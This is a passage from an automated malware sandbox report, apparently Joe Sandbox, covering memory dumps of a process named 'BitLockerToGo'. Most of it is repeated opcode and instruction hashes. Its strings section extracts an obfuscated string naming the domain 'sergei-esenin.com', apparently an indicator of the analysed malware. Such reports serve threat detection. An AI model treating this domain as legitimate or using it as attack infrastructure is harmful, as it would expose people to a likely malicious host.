                                                                                                                                                            • Instruction Fuzzy Hash: 2C110233A051D40EC3128D3C84106B5BFA31EA7274F5D939BE4F89B2E6D6268D8AC359
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0f9f778673f3e529b4aea6be0b8e9224fcb90e05f4f271bca4308f19bddaf4a2
                                                                                                                                                            • Instruction ID: b8d9a0782c8c7c5e048b3628c10e4cd8915ff78df5a6c5e6c6960488fa35759b
                                                                                                                                                            • Opcode Fuzzy Hash: 0f9f778673f3e529b4aea6be0b8e9224fcb90e05f4f271bca4308f19bddaf4a2
                                                                                                                                                            • Instruction Fuzzy Hash: 1501B1F170032147DB209E12B4C4727B2A8EFD2708F08043EE80857342DB7DEC1486AE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
                                                                                                                                                            • Instruction ID: aa4d63c4c97277b62731f14bec90b410f018f391b3d7958cd39a62f9012a05af
                                                                                                                                                            • Opcode Fuzzy Hash: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
                                                                                                                                                            • Instruction Fuzzy Hash: 87F05CB1A0411417DB22CD849CC4F77FBACCF87399F090426E8C1A7202F1755884C3EA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 443b775d5de63c73ff5dc87661aef6e88c6616c394f33af0bd257110e714242a
                                                                                                                                                            • Instruction ID: f032b11b1a9ddd9dc13c13fc807dcaf0e8db19b7f117900f85087f7b1a7806fa
                                                                                                                                                            • Opcode Fuzzy Hash: 443b775d5de63c73ff5dc87661aef6e88c6616c394f33af0bd257110e714242a
                                                                                                                                                            • Instruction Fuzzy Hash: D1E086BC8093128687009F10C8515BBB2B4AF87345F00285EE88157350F76CC985D36E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                            • Instruction ID: 9c758fa7a215bf9c728fbebe32270771f8f9286419ee55b993ba3ab27b7309b8
                                                                                                                                                            • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                            • Instruction Fuzzy Hash: 12D0A521508721465B7C8D199410577F7F0E9C7711F49955FF585D3244D234DC41C16D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 660218fefaa52bd330ec99c342415da08580af5dc128e550123f5800ccb604d1
                                                                                                                                                            • Instruction ID: 897859d0341ad2f3df62f084b9e9202fef533f110960bf7882fb236f00f8dbeb
                                                                                                                                                            • Opcode Fuzzy Hash: 660218fefaa52bd330ec99c342415da08580af5dc128e550123f5800ccb604d1
                                                                                                                                                            • Instruction Fuzzy Hash: F7900224E4C1408781008F009540479E379D38B111F60B5108008334198324E442454C
Strings
Memory Dump Source
• Source File: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID:
• String ID: "#$3m$c|{h$sergei-esenin.com$tjch$xq$|nkx
• API String ID: 0-2312890552
• Opcode ID: efd6b1e2a11b404d8618c02436c24d13ef05f48848111e042e81429ad5ee1a06
• Instruction ID: c23396bfd2754f0d8af95ff7610f3a380faea8e3d3387c487e16893230c2229d
• Opcode Fuzzy Hash: efd6b1e2a11b404d8618c02436c24d13ef05f48848111e042e81429ad5ee1a06
• Instruction Fuzzy Hash: 21B153B450E3D08BE331CF25C488B9BBBE5BB96304F144A6DE4C96B291C7399905CB97